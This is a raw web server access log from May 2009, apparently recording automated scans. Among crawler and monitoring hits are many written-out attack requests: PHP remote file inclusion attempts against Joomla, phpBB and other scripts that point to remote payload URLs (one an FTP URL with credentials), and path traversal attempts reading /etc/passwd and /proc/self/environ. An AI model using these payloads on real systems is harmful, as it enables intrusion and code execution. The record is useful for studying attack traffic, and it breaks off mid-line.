74.6.8.112 - - [08/May/2009:03:54:37 -0400] "GET /logs/error_log.Q107090700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.114 - - [08/May/2009:03:55:05 -0400] "GET /logs/error_log.Q107071800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.0.54.98 - - [08/May/2009:03:56:04 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
219.94.148.39 - - [08/May/2009:03:56:12 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.825"
124.0.54.98 - - [08/May/2009:03:56:31 -0400] "GET /logs/access_log.Q109041300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.75.218.247 - - [08/May/2009:03:57:03 -0400] "GET //errors.php?error=http://www.chaos-freunde.com/test1.gif??? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
62.75.218.247 - - [08/May/2009:03:57:03 -0400] "GET /logs//errors.php?error=http://www.chaos-freunde.com/test1.gif??? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
67.227.186.29 - - [08/May/2009:03:57:05 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festasapeca.com.br/img/c?? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.227.186.29 - - [08/May/2009:03:57:05 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festasapeca.com.br/img/c?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.227.186.29 - - [08/May/2009:03:57:05 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festasapeca.com.br/img/test.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
67.227.186.29 - - [08/May/2009:03:57:05 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festasapeca.com.br/img/test.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.249.72.114 - - [08/May/2009:03:57:14 -0400] "GET /images/items/suture_nylon_thumb.jpg HTTP/1.1" 200 2771 "-" "Googlebot-Image/1.0"
74.6.8.112 - - [08/May/2009:03:57:27 -0400] "GET /logs/error_log.Q108012300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [08/May/2009:03:57:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.246.101.99 - - [08/May/2009:03:58:00 -0400] "GET /logs//modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=../../../../../../../../etc/passwd HTTP/1.0" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
194.246.101.99 - - [08/May/2009:03:58:00 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.rabika.ru/hk? HTTP/1.0" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
74.6.8.112 - - [08/May/2009:03:58:47 -0400] "GET /logs/access_log.Q107122500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.68.196 - - [08/May/2009:03:59:37 -0400] "GET /logs/access_log.Q108091000//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.153.212.195 - - [08/May/2009:03:59:58 -0400] "GET /show_news.php?cutepath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
122.153.212.195 - - [08/May/2009:03:59:58 -0400] "GET /logs/show_news.php?cutepath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
122.153.212.195 - - [08/May/2009:03:59:58 -0400] "GET /logs/access_log.Q108081400%20%20/show_news.php?cutepath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.153.212.195 - - [08/May/2009:04:00:00 -0400] "GET /logs/show_news.php?cutepath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
122.153.212.195 - - [08/May/2009:04:00:00 -0400] "GET /show_news.php?cutepath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
122.153.212.195 - - [08/May/2009:04:00:00 -0400] "GET /logs/access_log.Q108081400%20%20/show_news.php?cutepath=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.29.68.196 - - [08/May/2009:04:00:01 -0400] "GET /logs/access_log.Q108100100//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:38 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:38 -0400] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:38 -0400] "GET /logs/access_log.Q108122800//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:40 -0400] "GET /logs/?_phplib%5Blibdir%5D=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 200 480 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:40 -0400] "GET /logs/error_log.Q109042700/?_phplib%5Blibdir%5D=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:40 -0400] "GET /?_phplib%5Blibdir%5D=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:41 -0400] "GET /?_phplib%5Blibdir%5D=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:41 -0400] "GET /logs/?_phplib%5Blibdir%5D=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 200 480 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:41 -0400] "GET /logs/access_log.Q109021900%20%20/?_phplib%5Blibdir%5D=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:00:42 -0400] "GET /logs/access_log.Q108110200//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:04:00:57 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:04:01:08 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:04:01:08 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:04:01:08 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
218.249.36.194 - - [08/May/2009:04:01:16 -0400] "GET /logs/access_log.Q108102400%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:04:01:16 -0400] "GET /logs/access_log.Q108100100%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:01:22 -0400] "GET /logs/error_log.Q109031200%20%20/?_phplib%5Blibdir%5D=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:04:01:46 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:04:01:47 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:04:01:47 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
210.118.194.225 - - [08/May/2009:04:01:58 -0400] "GET /logs/error_log.Q109031800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
209.59.12.99 - - [08/May/2009:04:02:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.40.251 - - [08/May/2009:04:02:58 -0400] "GET /logs/access_log.Q108122800%20%20//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:04:02:58 -0400] "GET /logs/access_log.Q108110200%20%20//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
123.125.64.38 - - [08/May/2009:04:02:59 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
86.54.102.45 - - [08/May/2009:04:03:51 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:04:03:51 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:04:03:54 -0400] "GET /logs/access_log.Q108060400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:04:03:56 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:04:04:07 -0400] "GET /logs/access_log.Q109040500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:04:04:13 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
218.150.79.146 - - [08/May/2009:04:04:27 -0400] "GET /logs/access_log.Q108091000//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:04:04:29 -0400] "GET /logs/index.php?pagina=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:04:04:29 -0400] "GET /index.php?pagina=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:04:04:29 -0400] "GET /logs/access_log.Q108090900/index.php?pagina=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:04:04:34 -0400] "GET /logs/access_log.Q108120300/index.php?pagina=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.212.195 - - [08/May/2009:04:04:58 -0400] "GET /logs/access_log.Q109020600//include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
61.19.241.61 - - [08/May/2009:04:05:00 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
218.150.79.146 - - [08/May/2009:04:05:11 -0400] "GET /logs/access_log.Q108100100//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:04:07:33 -0400] "GET /logs/access_log.Q108082800 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [08/May/2009:04:09:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.109.75.80 - - [08/May/2009:04:09:30 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/test.txt? HTTP/1.0" 404 208 "-" "libwww-perl/5.803"
110.45.145.92 - - [08/May/2009:04:10:51 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
110.45.145.92 - - [08/May/2009:04:10:51 -0400] "GET /logs/access_log.Q108100500//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
110.45.145.92 - - [08/May/2009:04:10:51 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
207.44.232.81 - - [08/May/2009:04:10:53 -0400] "GET /errors.php?error=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.44.232.81 - - [08/May/2009:04:10:53 -0400] "GET /logs/access_log.Q108083100%20%20/errors.php?error=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.44.232.81 - - [08/May/2009:04:10:53 -0400] "GET /logs/errors.php?error=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:04:10:54 -0400] "GET /logs/access_log.Q108082200//s_lodenv.inc.php?DOCUMENT_ROOT=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
206.225.92.50 - - [08/May/2009:04:10:54 -0400] "GET /logs///dotproject//includes/db_connect.php?baseDir=../../../../../../../../etc/passwd HTTP/1.0" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
66.197.202.64 - - [08/May/2009:04:10:55 -0400] "GET //s_lodenv.inc.php?DOCUMENT_ROOT=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:04:10:55 -0400] "GET /logs//s_lodenv.inc.php?DOCUMENT_ROOT=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
206.225.92.50 - - [08/May/2009:04:10:55 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://www.rabika.ru/hk? HTTP/1.0" 404 239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
110.45.145.92 - - [08/May/2009:04:10:56 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
110.45.145.92 - - [08/May/2009:04:10:56 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
110.45.145.92 - - [08/May/2009:04:10:56 -0400] "GET /logs/access_log.Q108100500//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
110.45.145.92 - - [08/May/2009:04:11:02 -0400] "GET /logs/access_log.Q109013000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
66.197.202.64 - - [08/May/2009:04:11:04 -0400] "GET /logs/access_log.Q108072300//s_lodenv.inc.php?DOCUMENT_ROOT=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:04:11:08 -0400] "GET /logs/access_log.Q109013000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
61.19.241.61 - - [08/May/2009:04:11:32 -0400] "GET /logs/access_log.Q109041500//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:04:11:32 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
62.116.168.108 - - [08/May/2009:04:11:34 -0400] "GET //s_lodenv.inc.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:04:11:34 -0400] "GET /logs/access_log.Q108082200//s_lodenv.inc.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:04:11:34 -0400] "GET /logs//s_lodenv.inc.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:04:11:35 -0400] "GET /logs/access_log.Q108120300%20%20/index.php?pagina=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:04:11:35 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
89.111.184.103 - - [08/May/2009:04:11:44 -0400] "GET /logs/error_log.Q109041500//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
211.110.19.178 - - [08/May/2009:04:11:46 -0400] "GET /logs/access_log.Q108090900%20%20/index.php?pagina=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:04:11:48 -0400] "GET /logs/access_log.Q108072300//s_lodenv.inc.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:04:11:48 -0400] "GET /logs/access_log.Q109011700%20%20/home.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:04:11:48 -0400] "GET /home.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:04:11:48 -0400] "GET /logs/home.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
140.109.103.221 - - [08/May/2009:04:11:56 -0400] "GET /logs/access_log.Q108122200//components/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:11:56 -0400] "GET //components/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:11:56 -0400] "GET /logs//components/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:11:56 -0400] "GET /logs/access_log.Q108122200/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:11:56 -0400] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:11:56 -0400] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:11:57 -0400] "GET /logs/access_log.Q108122200//components/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
140.109.103.221 - - [08/May/2009:04:11:57 -0400] "GET //components/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 220 "-" "XXXXXX"
140.109.103.221 - - [08/May/2009:04:11:57 -0400] "GET /logs//components/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 225 "-" "XXXXXX"
140.109.103.221 - - [08/May/2009:04:11:57 -0400] "GET /logs/access_log.Q108122200//components/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "XXXXXX"
140.109.103.221 - - [08/May/2009:04:11:57 -0400] "GET //components/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 220 "-" "XXXXXX"
140.109.103.221 - - [08/May/2009:04:11:57 -0400] "GET /logs//components/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "XXXXXX"
121.254.231.239 - - [08/May/2009:04:11:59 -0400] "GET /logs/access_log.Q109032100%20%20/home.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:04:12:00 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:04:12:00 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:04:12:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
140.109.103.221 - - [08/May/2009:04:12:02 -0400] "GET /logs/access_log.Q108083000//components/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:12:02 -0400] "GET /logs/access_log.Q108083000/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
140.109.103.221 - - [08/May/2009:04:12:03 -0400] "GET /logs/access_log.Q108083000//components/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
140.109.103.221 - - [08/May/2009:04:12:03 -0400] "GET /logs/access_log.Q108083000//components/errors.php?error=../../../../../../../../../../../../.